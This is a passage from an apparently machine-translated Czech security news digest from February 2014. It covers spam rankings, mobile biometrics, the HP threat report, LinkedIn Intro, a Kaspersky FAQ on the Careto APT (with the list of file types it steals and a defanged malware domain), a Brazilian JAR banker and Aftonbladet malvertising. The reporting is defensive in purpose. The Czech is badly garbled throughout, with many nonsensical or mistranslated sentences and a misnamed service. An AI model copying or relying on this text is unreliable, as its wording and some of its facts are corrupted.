musí být zaručeno, že nebude deportován do USA.
USA stále globální spam král
11.2.2014 Spam
SophosLabs odhalil Dirty Dozen top spam-předávání národy, neboť zveřejnila závěrečnou "Spampionship" ligovou tabulku roce 2013. Opět, je to USA, který získal lize je první místo, generování 14,5 procenta z celkového objemu nevyžádané pošty odeslané v průběhu posledního čtvrtletí roku, což je čistou sérii špičkových povrchových úprav pro rok 2013. Nicméně, rozdíl na druhé místo zúžil, přičemž Čína re-objevující se jako hlavní aktér v rozesílání spamu Dirty Dozen, vyskočil z 4,6 procenta na 8,2 procenta, zatímco podíl Ruska spam mírně zvýšil z 3,0 procenta ve 3. čtvrtletí na 5,5 procenta ve 4. čtvrtletí.
"Nejviditelnější zprávy z grafů Tucet špinavců je, že problém zombified počítačů chrlí spam je skutečně globální," říká Sophos senior bezpečnostní analytik, Paul Ducklin. "Každý region na světě je silně zastoupena, s výjimkou Afriky . " Spammeři neposílají spam se: používají botnety, nebo ""., počítačů, malware-infikovaných distribuovat jejich spam pro ně, téměř vždy bez majitelů infikované počítače jsou si vědomi zombie armády "Ve většině případů, země Dirty Dozen dělal to do seznamu, protože statisticky významný podíl jejich obyvatel se provádí on-line podnikání pomocí počítačů, které jsou aktivně infikované dálkového ovládání malware, "říká Ducklin." Tak spam aspekt je jen symptom - začátek problému. Zombie malware znamená, že podvodníci jsou již na vnitřní straně. Záleží jen na vás, trávník je ven. " Pokud jde o tabulky Spampionship zemí spam, předávání podle počtu obyvatel, čísla ukazují průměrnou "spamminess" na osobu ve srovnání s USA. Výsledky ukazují věci, které zůstaly docela stabilní, protože Bělorusko udržel první místo, s průměrným počítačem tam více než 10 krát větší pravděpodobnost k rozesílání nevyžádané pošty, než kdyby to bylo v USA. Zatím jiných zemích, jako je Uruguay, na Tchaj-wanu, Lucembursko a Makedonie i nadále žokej na pozici 12 v horní. Jediný významný krok přišel z Kuvajtu, se čísla znázorňující, že byl téměř trojnásobný nárůst nevyžádané pošty-přeložka na obyvatele, roste z 2,1 násobku na obrázku v USA na obyvatele, na 6,07, povýšit ho na druhé místo v tabulce. V Spampionship ligové tabulky nejsou určeny k naznačují, že jednotlivé národy jsou aktivně zapojeni do nelegální rozesílání spamu, ale jsou navrženy tak, aby zvýšení povědomí o kolik počítačů jsou potenciálně infikovány spamu, předávání malware. "Pokud vaše země není v Dirty Dozen, je to snadné cítit samolibě, nebo alespoň na vavřínech, "říká Ducklin." Nedělej to: pokud jste spam odesílatel, Tucet špinavců nebo ne, jste čistý pozitivní přispěvatelem počítačové trestné činnosti ".
Do roku 2016 bude 30% organizací používá biometrické ověřování na mobilních zařízeních
11.2.2014 Biometrika
Konzumerizace IT a obchodních BYOD programy mají za následek potenciální bezpečnostní problémy pro vedoucí IT podle společnosti Gartner. Očekávání uživatelů mobilních uživatelů čisté a jednoduché zkušeností často převáží obavy o bezpečnost, a stejná cenná data hlídané složitých hesel a bezpečnostních opatření na PC může být ponecháno zranitelný na mobilních zařízeních. Gartner předpovídá, že do roku 2016, 30 procent organizací se bude používat biometrické ověřování na mobilních zařízeních, a to až z pěti procent dnes. "Mobilní uživatelé spolehlivě odolávají metody ověřování, které byly snesitelné na PC a jsou stále potřebné pro posílení bezpečný přístup na mobilních zařízeních," řekl Ant Allan, viceprezident výzkumu ve společnosti Gartner. "Vůdci Bezpečnostní musí řídit očekávání uživatelů a vzít v úvahu zkušenosti uživatelů, aniž by zahrnující bezpečnost." Gartner označila některé potenciální dopady zabezpečení na konzumerizace IT, a učinil několik doporučení pro vedoucí bezpečnosti IT. Uživatelská zkušenost vítězí bezpečnostní obavy Zatímco většina organizace vyžadují robustní hesla na notebooky, smartphony a tablet zařízení často mají přístup ke stejným aplikacím a kritických dat, ale ne stejné úrovně bezpečnosti. Zvýšený počet přístrojů ve hře také zhoršuje vystavení důležitých informací. Implementace standardních Power-On Password politiky je mnohem složitější o přijetí BYOD praktik, s nevyhnutelným střetem přes uživatelských práv a soukromí. Zatímco komplexní hesla může být problematické zejména pro uživatele, zadejte na mobilních zařízeních, pokud tato zařízení konání firemních dat nebo poskytují přístup k podnikovým systémům, jako je e-mail bez dalšího přihlášení, dokonce i výchozí čtyřmístné heslo je nevhodné. Nicméně, podpora pro robustnější ověřování po zapnutí, je nerovnoměrný, jen s několika mobilních operačních systémů a zařízení podporujících biometrické autentizace. I v případech, které nabízejí tuto podporu, může implementace nemůže být dost dobré pro obchodní použití. "osmimístné číselné heslo bude vyžadovat hodiny k vybrání, a že odradí příležitostné hackery pomocí sady nástrojů," řekl John Girard, viceprezident a Rozlišují analytik společnosti Gartner. "Nicméně, dokonce i šest znaků malá alfanumerické heslo může poskytnout miliardy hodnot. Pro většinu praktických účelů, hackeři nejsou připraveni pokračovat v tomto velkou sadu kombinací vzhledem k relativně pomalé rychlosti se podílejí na hrubou silou útoků proti smartphony a tablety. " Gartner doporučuje, aby politika heslo vyžadující použití nejméně šesti alfanumerických znaků, a zakazuje se slovům ze slovníků, je vynucena na zařízeních s přístupem k firemním informacím prostřednictvím mobilního správu zařízení (MDM) nástroje. tlustou čáru za minulostí Některé organizace se pokusí čelit rizikům ze ztraceného nebo odcizeného zařízení od provádění kontrol, že vymazání zařízení po omezeném počtu nesprávných zadání hesla, nebo pomocí vzdáleného příkazu. "Tato praxe není zcela zmírnění rizika, protože je téměř nemožné přepsat solid-state pamětí," řekl pan Girard. "Nejlepší je použít šifrování, která není vázána na ověření primární energie-na, což znamená, že klíč není možné obnovit ze zařízení poté, co byla provedena měkký otřete operace." Kromě toho, Gartner doporučuje, aby další způsob ověřování - minimálně další heslo - by měly být použity pro přístup k citlivým podnikovým aplikacím a datům. Tímto způsobem, i když hacker poruší zapnutí obrany, každá další aplikace nebo ukládat dat představuje další výzvu, která bude společně, přítomný příliš překážku, aby se vyplatilo. V některých případech, ověřování vyšší jistota je nutné. V PC (tradičně), samostatné zařízení, může být použit k poskytnutí hardwarový token, který by mohl být použit pro dodatečné ověření. "Tradiční ověřování tohoto druhu je často odmítnuty v případě mobilního použití, kvůli špatné uživatelské zkušenosti s mnoha druhy hardwarových tokenů," řekl pan Allan. "Žonglování token v jedné ruce, telefon v druhé a latte ve třetí je stále vzdoroval uživatelů mobilních zařízení." Softwarové tokeny, např. X.509 pověření na koncový bod, poskytuje možnosti v tomto případě, ale často potřebují MDM nástroje, které mají být správně a stále realizované vyžadovat dodatečné kontroly poskytnout autentizaci vyšší zajištění nezbytné v některých organizacích. Biometrické možnosti nabídnout kompromis Gartner doporučuje, aby vedoucí bezpečnostní hodnotit biometrických metod autentizace, kde je vyžadována autentizace vyšší jistotu. Vhodné režimy ověřování patří rozhraní interaktivitu, rozpoznávání hlasu, obličeje topografii a duhovky strukturu. Tyto režimy mohou být použity ve spojení s heslem, které umožňuje ověření vyšší zajištění bez nutnosti jakékoliv významné změny v chování uživatele. Kromě toho, jako mobilní zařízení, sama o sobě poskytuje bohatý uzel identity relevantní kontextových dat, tyto informace mohou být také použity pro zvýšení důvěra v reklamované identity. Je možné, že kombinace pasivní biometrické autentizace a kontextuální ověřování bude poskytovat dostatečnou záruku ve scénáři se středním rizikem bez nutnosti "brány" pro ověření události pomocí hesel nebo tokenů. To je také důležité při plánování komplexní politiku ověřování, která zahrnuje mobilní zařízení, aby zvážila zátěž organizací a uživatelů podobně, takže politika je udržitelná. "Přijetí významně různé metody ověřování pro různá zařízení bude nakonec neudržitelné," řekl pan Allan, "Mobile-apt metody ověřování musí být také PC apt. Kombinace X.509 pověření na koncový bod, nízkým třením biometrických režimů a kontextuální ověřování bude pravděpodobně slušet. "
Akreditace Program posiluje bezpečnost globálního dodavatelského řetězce
11.2.2014 IT
The Open Group zahájila Open Trusted Technology Provider Standardní ( O-TTPS ) Akreditace Program, jehož cílem je zajistit integritu komerční off-the-shelf (COTS) informačních a komunikačních technologií (ICT) výrobky po celém světě a ochrany globálního dodavatelského řetězce proti počítačové kriminalitě . útoky , jejichž cílem je zajistit integritu ve vývoji technologií a aby se zabránilo nebezpečným poskvrněné a padělaných přípravků do dodavatelského řetězce, bude akreditace programu zajistí žadatelé v souladu s normou O-TTPS. Firmy hledají O-TTPS Akreditace - což by mohlo být dodavatelé součástí, poskytovatelé technologií nebo integrátor - můžete si vybrat, které mají být akreditovány pro odpovídající normě O-TTPS a dodržování požadavků osvědčených postupů v rámci celého podniku, a to v konkrétní produktové řady nebo obchodní jednotky nebo v jedné nebo více jednotlivých produktů. Organizace zažádá O-TTPS akreditované jsou pak povinni poskytnout důkazy o shodě pro každý z požadavků na O-TTPS, prokázat, že mají zavedeny postupy k zajištění jejich in-house vývoj a jejich dodavatelské řetězce v rámci celého životního cyklu produktu COTS informačních a komunikačních technologií, včetně návrhu , fáze sourcing, stavět, naplnění, distribuce, podporou perspektivních a likvidace. O-TTPS akreditovaných organizací pak budou moci poznat sebe jako otevřených důvěryhodných technologií poskytovatelů a stanou se součástí veřejného rejstříku důvěryhodných poskytovatelů, kteří pomáhají zajistit, že "Postav se Integrita ", aby jejich zákazníci mohou" koupit s jistotou ". The Open Group je rovněž oznamuje O-TTPS rozpoznaného hodnotitel program, který zajistí, že Uznávané posuzovatel (firem) splňovat určitá kritéria jako třetí osoba hodnotitele organizace a že jejich posuzovatelé (fyzické osoby) splňují další sadu kritérií a složili zkoušku O-TTPS hodnotitelem, před tím, než mohou být přiřazeny k O-TTPS hodnocení. The Open Group bude fungovat tento program, udělit O-TTPS uznávaná osvědčení posuzovatele a seznam těchto kvalifikačních organizace na veřejného registru.
Top bezpečnostní firmě hrozby, které
11.2.2014 Bezpečnost
Nová zpráva od společnosti HP poskytuje hloubkovou analýzu dat a kolem nejpalčivějších bezpečnostních problémů trápí podniky. Podrobně faktory, které nejvíce přispěly k rostoucí útoku povrch v roce 2013, zvýšené závislosti na mobilních zařízeních, šíření nejisté softwaru a rostoucím využíváním doporučení Java a nastiňuje pro organizace minimalizovat bezpečnostní rizika a celkový dopad útoků.
"Protivníci jsou dnes více než kdy jindy adept a spolupracují efektivněji využít zranitelnosti v celém neustále se rozšiřující útoku," řekl Jacob West, technický ředitel, Enterprise Security Products, HP. "Průmysl musí spolčit se aktivně sdílet bezpečnostní informace a taktiky, aby se nenarušila škodlivé aktivity poháněné rostoucí podzemní trhu." Zatímco výzkum zranitelnost pokračoval získat pozornost, celkový počet veřejně známé chyby zabezpečení se snížila o 6 procent ročně po roce, a množství vysoce rizikových zranitelností klesaly čtvrtý rok po sobě, snížení o 9 procent. I když nelze vyčíslit, pokles může být údaj jako k nárůstu zranitelnosti, které nejsou veřejně zveřejněny, ale doručeným na černém trhu pro soukromé a / nebo zločinný spotřeby. Téměř 80 procent žádostí hodnocených obsahovala zranitelnosti zakořeněné mimo jejich zdrojový kód. Dokonce i odborně kódované software může být nebezpečně zranitelná, pokud chybně nakonfigurován. rozporné a různé definice malware analýzy komplikovat rizik. Při zkoumání více než 500.000 mobilních aplikací pro Android, HP nalézt významné rozdíly mezi tím, jak antivirů a mobilní prodejci platformy klasifikaci malware. Čtyřicet šest procent mobilních aplikací studovaných šifrování použití nesprávně. Výzkum HP ukazuje, že mobilní vývojáři se často nedaří používat šifrování při ukládání citlivých dat na mobilních zařízeních, se spoléhat na slabých algoritmů, aby tak učinily, nebo zneužívat silnější šifrovací schopnosti, které je činí neefektivní. Internet Explorer je software, nejvíce zaměřen Initiative HP Zero Day ( Vědci ZDI) zranitelnosti v roce 2013, a představoval více než 50 procent zranitelností získaných v rámci programu. Tato pozornost je výsledkem tržních sil zaměřených výzkumných pracovníků na Microsoft zranitelnosti a neodráží na celkovém zabezpečení aplikace Internet Explorer. Sandbox bypass zranitelnosti byly nejčastější a škodlivé pro uživatele Java. Protivníci výrazně eskaloval jejich využívání Java současným zaměřením více známých (a nula den) zranitelnosti v kombinovaných útoků ohrozit specifické cíle zájmu. Klíčové doporučení:
V dnešním světě rostoucích kybernetických útoků a rostoucími nároky na bezpečný software, je nutné eliminovat příležitosti k nechtěnému odhalení informací, které mohou být prospěšné pro útočníky.
Organizace a vývojářům musí zůstat vědomý bezpečnostních úskalí v rámcích a jiný kód třetí strany, zejména pro hybridní vývojových platforem mobilních. Robustní bezpečnostní směrnice musí být přijaty k ochraně integrity aplikací a soukromí uživatelů.
I když je možné odstranit útoku, aniž by byla obětována funkčnost, kombinaci těch správných lidí, procesů a technologií má umožnit organizacím efektivně minimalizovat zranitelnost, které ji obklopují, a výrazně snížit celkové riziko.
Spolupráce a hrozba sdílení zpravodajských informací mezi bezpečnostním průmyslu pomáhá získat vhled do taktiky protivníka, což umožňuje více proaktivní obranu, posílení ochrany nabízené v bezpečnostních řešení, a celkově bezpečnější prostředí.
Kompletní zpráva od společnosti HP je k dispozici zde (nutná registrace).
LinkedIn ukončuje službu Intro
11.2.2014 Sociální sítě
Profesionální sociální síť ukončuje provoz své nedávno spuštěné mobilní služby Intro, která byla určena k tomu, aby spojovala lidi přes email, ale kterou experti kritizovali kvůli bezpečnosti.
LinkedIn spustil Intro v říjnu minulého roku v rámci své strategie „mobilní služby na prvním místě“. Služba byla určena pro iPhone a byla navržena tak, aby „vzala“ informace z profilu uživatele a vložila je do odeslaných e-mailů. Služba zobrazila informace příjemci tehdy, pokud měl odesílatel i příjemce účet na LinkedIn. Účelem Intra mělo být to, aby e-maily získaly profesionálnější rozměr a přivedly na LinkedIn více uživatelů.
Krátce po spuštění služby však bezpečnostní experti začali zpochybňovat, způsob, jakým služba zpracovává e-maily na serverech LinkedIn. Konzultantská společnost Bishop Fox uvedla, že služba je jako stvořená pro útoky kyberzločinců a je jen otázkou času, než ji někdo zneužije k phishingovému útoku.
LinkedIn ve svém pátečním oznámení o uzavření služby neuvedl, zda byla důvodem bezpečnost. Podle společnosti rozhodnutí padlo kvůli „zaměření firmy“. „Děláme velké dlouhodobé investice, kdy se soustředíme na pouze několik věcí. Abychom zajistili jejich úspěch, musíme se věnovat méně věcem,“ napsal první viceprezident pro produkty Deep Nishar.
Nitro bude ukončeno 7. března. LinkedIn neuvedl, co udělá s emailovými daty uživatelů, která se ukládala na jeho serverech. Společnost se zatím odmítla k této otázce vyjádřit. Podle Bishop Fox je nepravděpodobné, že LinkedIn ukončuje svou službu pouze z bezpečnostních důvodů. „Technologické produkty v dnešní době přicházejí a zase odcházejí a řada z nich má krátkou životnost,“ uvedl partner společnosti Vincent Liu.
„Avšak tato epizoda je jasným příkladem toho, proč je důležité dbát na soukromí a bezpečnost, a to i na mobilních zařízeních,“ dodal Liu. LinkedIn také uvedl, že bude rušit i další služby. Slidecast, jenž lidem umožňuje nahrávat digitální prezentace s audiem, končí 30. dubna a podpora aplikace LinkedIn pro iPad pro verze iOS starší než 6.0 končí 18. února.
V Careto / Mask APT: Často kladené otázky
10.2.2014 APT
Co přesně je Careto / "The Mask"?
Maska je moderní hrozba herec, který byl zapojen do cyber-špionážních operací nejméně od roku 2007.
Co dělá maska zvláštní, je složitost sady nástrojů používaných útočníky. To zahrnuje velmi sofistikovaný kus malware, rootkit, je bootkit, Mac OS X a Linux verze a případně i verze pro Android a iPad / iPhone (iOS).
Maska také používá vlastní útok proti starší produkty společnosti Kaspersky Lab, aby bylo možné skrýt v systému. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších hrozeb v současné době. Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované provoz.
Proč to volat maska?
Název "Mask" pochází ze španělského slangu slovo "Careto" ("Mask" nebo "Ugly Face"), které autoři obsažené v některých malware modulů.
=
Kdo jsou oběti? / Co můžete říci o cílech útoků?
Mezi hlavní cíle Careto spadají do následujících kategorií:
Vládní instituce
Diplomatické úřady a velvyslanectví
Energie, ropy a zemního plynu společnosti
Výzkumné instituce
Private equity firmy
Aktivisté
Víme, celkový počet obětí?
I když přesný počet obětí není znám, jsme pozorovali obětí na více než 1000 IP adres v 31 zemích. Infekce byly pozorovány v: Alžírsko, Argentina, Belgie, Bolívie, Brazílie, Čína, Kolumbie, Kostarika, Kuba, Egypt, Francie, Německo, Gibraltar, Guatemala, Íránu, Iráku, Libye, Malajsie, Mexiko, Maroko, Norsko, Pákistán , Polsko, Jižní Afrika, Španělsko, Švýcarsko, Tunisko, Turecko, Velká Británie, Spojené státy a Venezuela.
Na identifikační algoritmus jsme vyvinuli na základě, jsme napočítali více než 380 unikátních oběti mezi více než 1000 + IP.
Nicméně, vzhledem informace oběť byla shromážděna pouze pro některé rozkazech a kontrolních serverů a sinkholed hostitelů, může celkový počet postižených zemí a jedinečné obětí bude mnohem vyšší.
Co Careto dělat? Co se stane poté, co je cílový počítač je nakažený?
Pro oběti, infekce Careto je katastrofální. Malware zachytí všechny komunikační kanály a shromažďuje nejdůležitější informace z infikovaného systému. Detekce je velmi obtížné, protože stealth schopností rootkit. Kromě vestavěných funkcí, mohou provozovatelé Careto nahrát další moduly, které lze provést jakékoliv nebezpečný úkol. Vzhledem k povaze známých obětí, dopad je potenciálně velmi vysoká.
Jak se Careto infikovat počítače?
Maska kampaně jsme zjistili, spoléhá na e-maily, kopí-phishing s odkazy na nebezpečné webové stránky. Infikovaná stránka obsahuje řadu činů, jejichž cílem je infikovat návštěvníka, v závislosti na jeho konfiguraci systému. Po úspěšném infekce, infikovaná stránka přesměruje uživatele na benigní webové stránky odkazované v e-mailu, který může být film, YouTube nebo zpravodajský portál.
Je důležité si uvědomit, využívat webové stránky nejsou automaticky nakazit návštěvníky, místo toho, útočníci hostit využije při určitých složek na webových stránkách, které nejsou přímo odkazuje nikde, s výjimkou škodlivých e-mailů. Někdy, útočníci použít sub-domén na zneužití webových stránkách, aby se jim zdají být legitimní. Tyto sub-domény simulovat dílčí úseky hlavních novin ve Španělsku plus některé mezinárodní ty jako Guardian a Washington Post.
Jsou útočníci využívají všechny zero-day zranitelnost?
Zatím jsme zaznamenali útoky pomocí více vektorů. Patří mezi ně alespoň jedna aplikace Adobe Flash Player využití (CVE-2012-0773). Využití byla navržena pro Flash Player verze před 10.3 a 11.2.
CVE-2012-0773 byl původně objeven VUPEN a má zajímavý příběh. Jednalo se o první využití rozbít pískoviště Chrome a byl použit vyhrát soutěž CanSecWest Pwn2Own v roce 2012. Využít způsobil trochu kontroverzní, protože tým VUPEN odmítl prozradit, jak unikl pískoviště, prohlašovat, že oni byli plánuje prodat využít pro své zákazníky. Je možné, že herec Careto hrozba koupili tuto chybu z VUPEN. (Viz příběh o Ryan Naraine )
Jiné vektory používané patří sociální inženýrství, žádá uživatele, aby si stáhnout a spustit soubor JavaUpdate.jar nebo nainstalovat Chrome prohlížeče plugin. Máme podezření, že ostatní exploity existují také, ale my útočiště-t byl schopen je získat z útoku serveru.
Je to pouze pro systém Windows hrozba? Které verze systému Windows jsou určeny? Existují Mac OS X nebo Linux varianty?
Zatím jsme pozorovali trojské koně pro Microsoft Windows a Mac OS X. Některé využívat serverové cesty obsahuje moduly, které se zdají být navrženy tak, aby infikovat počítače Linux, ale dosud se nachází na Linux backdoor. Navíc, některé z C & C artefaktů (záznamy) naznačují, že také mohou existovat zadní vrátka pro Android a Apple iOS.
Viděli jste žádný důkaz o mobilní komponenty - iOS, Android nebo BlackBerry?
Máme podezření, iOS backdoor existuje, ale nebyli jsme schopni najít to ještě. Podezření je založeno na protokolu ladění z jednoho ze serverů C & C, pokud je zjištěno oběť v Argentině a přihlášeni jako uživatel s agenta na "Mozilla/5.0 (iPad; CPU OS 6_1_3 jako Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B329 ". Zdá se, že naznačují, že je iPad, i když bez vzorku, je těžké být jisti.
Kromě toho jsme také podezření na existenci Android implantátu. Tento je založen na jedinečném identifikátoru verze zaslané C & C, což je "AND1.0.0.0". Komunikace s tímto jedinečným identifikátorem byly pozorovány přes 3G spojení, což naznačuje možnou mobilní zařízení.
Jak se liší od jakéhokoli jiného APT útoku?
Co dělá maska zvláštní, je složitost sady nástrojů používaných útočníky. To zahrnuje velmi sofistikovaný malware, rootkit, je bootkit, Mac a Linux verze a případně i verze pro Android a iPad / iPhone (Apple iOS).
Také maska používá vlastní útok starších produktů Kaspersky aby skryl v systému. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších apts v současné době. Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované provoz.
Jak jste se dozvěděl o této hrozby? Kdo to hlásil?
Původně jsme si uvědomili Careto, když jsme pozorovali pokusy o zneužití zranitelnosti v našich produktech, aby se malware? Neviditelný? v systému.
Samozřejmě, že to zvedl náš zájem a náš výzkumný tým se rozhodl dále zkoumat. Jinými slovy, útočníci přitahuje naši pozornost tím, že se snaží využít produkty společnosti Kaspersky Lab.
Ačkoliv zranitelnosti v produktech byla objevena a pevná před pěti lety, je zde stále možnost, že existují uživatelé, kteří tam útočiště-t aktualizované produkt. V takových případech využívat může být stále aktivní, i když to nebude nám brání odstranění malware a čištění systému.
Existují rozmanité varianty Careto? Existují velké rozdíly ve variantách?
Careto je vysoce modulární systém, podporuje zásuvné moduly a konfiguračních souborů, které umožňují, aby provést velké množství funkcí.
Varianty Careto mají různé kompilace časová razítka sahající až do roku 2007. Většina modulů byly vytvořeny v roce 2012.
Je příkaz-a-řídicí server používaný Careto stále aktivní? Už jste byli schopni závrtu některý z C & Cs?
V současné době, všechny známé Careto C & C servery offline. Útočníci začali brát je v režimu offline v lednu 2014. Byli jsme také schopni závrtu několik C & C servery, které nám umožnily shromáždit statistické údaje o provozu.
Co přesně je ukraden z cílových strojů?
Malware shromažďuje velký seznam dokumentů z infikovaného systému, včetně šifrovacích klíčů, konfigurace VPN, SSH klíčů a RDP souborů. Existuje také několik neznámých rozšíření monitorováno, že jsme nebyli schopni identifikovat, a může souviset s vlastní vojenské / šifrovacích nástrojů na vládní úrovni.
Zde je úplný seznam nasbíraných souborů z konfigurací jsme analyzovaných:
*.AKF,*.ASC,*.AXX,*.CFD,*.CFE,*.CRT,*.DOC,*.DOCX,*.EML,*.ENC,*.GMG,*.GPG,*.HSE,*.KEY,
*.M15,*.M2F,*.M2O,*.M2R,*.MLS,*.OCFS,*.OCU,*.ODS,*.ODT,*.OVPN,*.P7C,*.P7M,*.P7Z,*.PAB,*.PDF,
*.PGP,*.PKR,*.PPK,*.PSW,*.PXL,*.RDP,*.RTF,*.SDC,*.SDW,*.SKR,*.SSH,*.SXC,*.SXW,*.VSD,
*.WAB,*.WPD,*.WPS,*.WRD,*.XLS,*.XLSX
Je to státem podporovaný útok?
Maska využívá vlastní útok proti starší produkty společnosti Kaspersky Lab, aby bylo možné skrýt v systému. Kromě toho, že obsahuje rootkit, je bootkit, verze Linux / Mac a možná i verze pro Apple iOS. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších apts v současné době.
Také jsme pozorovali velmi vysoký stupeň profesionality v provozních postupů skupiny v pozadí tohoto útoku, včetně sledování jejich infrastruktury, odstavení z provozu, aby se zabránilo zvědavýma očima pomocí přístupových pravidel, pomocí stírání namísto vymazání pro soubory žurnálu, atd. Tato úroveň provozní bezpečnosti není normální cybercriminal skupiny.
Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované kampaň.
Kdo je za to zodpovědný?
Uveďte je obtížný úkol. Na internetu, je velmi obtížné, aby se solidní připsání vzhledem k nestálé povaze způsobu, jakým byla postavena.
Některé stopy, jako například používání španělského jazyka jsou slabé, protože se mluví v mnoha zemích, včetně Latinské Ameriky, Mexika a Spojených státech (např. v Miami, kde existuje silná španělsky mluvící komunita).
Měli bychom také mít na paměti možnost pod falešnou vlajkou útoků před provedením jakékoli solidní předpoklad o totožnosti toho, kdo je odpovědný, aniž by velmi solidní důkaz.
Jak dlouho se útočníci byli aktivní?
Některé vzorky Careto byly sestaveny jako daleká záda jak 2007. Kampaň byla aktivní až do ledna 2014, ale v průběhu našeho šetření byly servery C & C vypnout.
To je nejméně pět let. Nemůžeme vyloučit možnost, že útočníci vzkřísit kampaň v určitém okamžiku v budoucnosti.
Věděli, že útočníci používají nějaké zajímavé / pokročilé technologie?
Backdoor Windows je velmi sofistikovaný, a útočníci používají řadu technik, aby se snažit, aby útok stealthier. Patří mezi ně injekci do systémových knihoven a pokouší se využít starší produkty společnosti Kaspersky Lab, aby se zabránilo odhalení.
Kromě toho, že využije pokrývají všechny potenciální cílové systémy, včetně Mac OS X a Linux. Také komunikace mezi různými využívají shell kódu modulů se provádí prostřednictvím cookies, což je docela neobvyklé techniky.
Má Kaspersky Lab detekovat všechny varianty tohoto malware?
Ano. Naše produkty detekovat a odstranit všechny známé verze malwaru používané útočníky. Jména detekce:
Trojan.Win32/Win64.Careto. *
Trojan.OSX.Careto
Existují Indikátory kompromisu (IOCs) na pomoc obětem identifikovat vniknutí?
Ano, MOV informace byly obsaženy v našem podrobném technickém výzkumu papíru.
Zde můžete přečíst naši plnou zprávu.
Šifrované Java Archive trojské bankéři z Brazílie
10.2.2014 Viry
Nikdy jsem si koupil PlayStation a nemá ani můj kolega Micha-san z Japonska - dobře, v jeho případě, alespoň ne z Brazílie. Nicméně, oba jsme obdrželi stejnou upozornění e-mailem:
V tomto případě se zločinci z Brazílie použil nový, ale velmi zvláštní techniku - šíří trojské bankéřů přes Jar. soubory. Říkám divné, protože i když stačí kliknout na jar souboru, nebude fungovat, pokud jste typ ". java-jar filename.jar "v konzoli, ale to nezastavilo brazilské zločinci a dokonce podařilo spoof naše e-mail pasti v Japonsku! Pojďme se podívat do jedné takové Brazilský Java Archive bankéře. První detekce na VT 02.01.2014 13:18:57 0/50 Po rozbalení a demontáž, uvidíte kód šifrované pomocí rozvodny šifry. To je, jak kód vypadá, než to dešifrovat:
Rozvodna nicka rutina je vložen do kódu a to je příklad toho, jak to funguje:
Kompletní tabulka substituovaných znaků je toto:
Po dešifrování stejný kód vypadá takto:
Tento malý 14kB. Jar bankéř pracuje jako downloader a je detekován Kaspersky Anti-Virus, jak Trojan.Java.Agent.da
Jakmile se infikuje počítač oběti, vytváří falešný složku, Google Chrome, kam se ukládají nově stažený bankéře z uvedených URL. To také pošle informaci PC oběti na vzdálený server, který je již dole. Proč se zločinci z Brazílie nyní přešel od Delphi Java? Možná je to nová generace zločinci, kteří již dostávají třídy Delphi.
Největší webová stránka ve Švédsku Šíření škodlivého kódu
10.2.2014 Viry
Tento týden byl jeden z nejvíce hektických týdnů po velmi dlouhou dobu, byl jsem pracoval ve dne v noci až do konce vše pro Analyst summitu Kaspersky Security . Nebyl jsem v náladě pro novou práci, protože velmi pozdní a hektické noci. Jsem na cestě ven ze dveří klesat děti a manželku na rodiče místě a najednou zazvoní telefon, jeho Magnus Lindkvist, který byl Security Evangelist společnosti Microsoft ve Švédsku. Je vždy příjemné mluvit s Magnuse, ale tentokrát měl jiný tón, na jeho hlas, byl to opravdu jen pro jakékoliv chit chat, a jen se mě zeptal, jestli jsem byl blízko k počítači. Nálada na něco vzrušujícího najednou jsou jen vrátil ke mně! Byl jsem zpět do hry! :)
Jako bezpečnostní výzkumník, jsem vždy mít alespoň jeden počítač s operačním systémem 24/7, on mi říká, že největší internetové stránky ve Švédsku, Aftonbladet se šíří malware. Rychle jsem se spustit svůj virtuální stroj, spustit Chrome a otevřete webovou stránku. Nic se nestane ... Co jsem zmeškal? Byl Magnus srandu? Pak na druhé straně telefonu slyším Magnus řekl: "Musíte používat Internet Explorer".
Škodlivý reklama, která byla spuštěna v Aftonbladet měl také skript pro kontrolu prohlížeč, pravděpodobně se vyhnout falešné infekcí, a byla vyvolána pouze tehdy, když uživatel spustí aplikaci Internet Explorer. Při návštěvě Aftonbladet a používáte Internet Explorer, budete přesměrováni na jinou webovou stránku, hxxp :/ / [Cut]. Windowsdefence-sn.nl na této stránce statický obraz falešné varování z Microsoft Security Essentials, které mají detekovaných virů na vašem počítači, a je třeba ji opravit. Obraz je opravdu z nástroje Microsoft Security Essentials, ale něco, co se zlí hoši vytvořili vyděsit lidi, že jsou infikované. Jedná se o velmi časté techniky malware spisovatelů. Když kliknete na obrázek, nemusíte nic opravit, můžete skutečně stáhnout soubor škodlivý. Soubor byl popletl Visual Basic spustitelný a je stále předmětem analýzy nás.
Nejprve jsem se ptal sám sebe, je to opravdu důležité? Vzhledem k tomu, že škodlivý reklama byla velmi rychle odstraněna z Aftonbladet, že se nevyužívá žádné zranitelnosti, je to "jednoduché" pokus o sociální inženýrství. Ale myslím, že je to velmi zajímavý a důležitý příběh vyprávět. Většina uživatelů dnes mají dojem, že potřebují k návštěvě pochybné webové stránky nakazit, ale podívejte se na to, co se tady stalo, největší internetové stránky ve Švédsku se šíří malware, ne proto, že dostal hacknutý, ale proto, že někdo s největší pravděpodobností koupil nebo ohrožena reklamy běžící na internetových stránkách. Velké internetové stránky často obsahují obsah z jiných webových stránek, a pokud protivníci ohrozit některou z těchto internetových stránek mohou také manipulovat s obsahem, který je stále součástí velkým stránkách.
V době psaní Nevím přesně, co se škodlivý kód dělá, ale přesto chci všechny varovat o tom! Prosím, mějte svou ochranu až do data! Chci také podpořit Aftonbladet informovat své čtenáře, pokud některý z jejich stránek je infikováno a šíření škodlivého kódu, a ne jen tiše odstranit škodlivý reklamu. To by pomohlo hodně, protože im jistý, že existuje mnoho lidí tam venku, kteří žádají vlastního života, pokud jejich počítač je nakažený, a v případě, že infekce se stále děje.
Podvodníci míří na olympiádu
10.2.2014 Kriminalita
